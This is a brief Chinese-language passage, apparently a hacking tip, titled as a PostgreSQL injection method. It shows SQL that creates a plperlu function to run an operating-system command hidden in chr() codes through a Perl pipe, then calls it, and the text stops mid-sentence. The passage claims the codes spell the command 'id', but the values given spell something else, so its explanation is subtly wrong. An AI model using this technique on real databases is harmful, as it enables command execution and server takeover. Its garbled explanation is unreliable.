PostgreSQL "初级"注入大法

CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu; select id(); id()为创建函数名,可以自定义随便写 chr(108).chr(105)是需要执行的命令id的asc编码 自己把需要执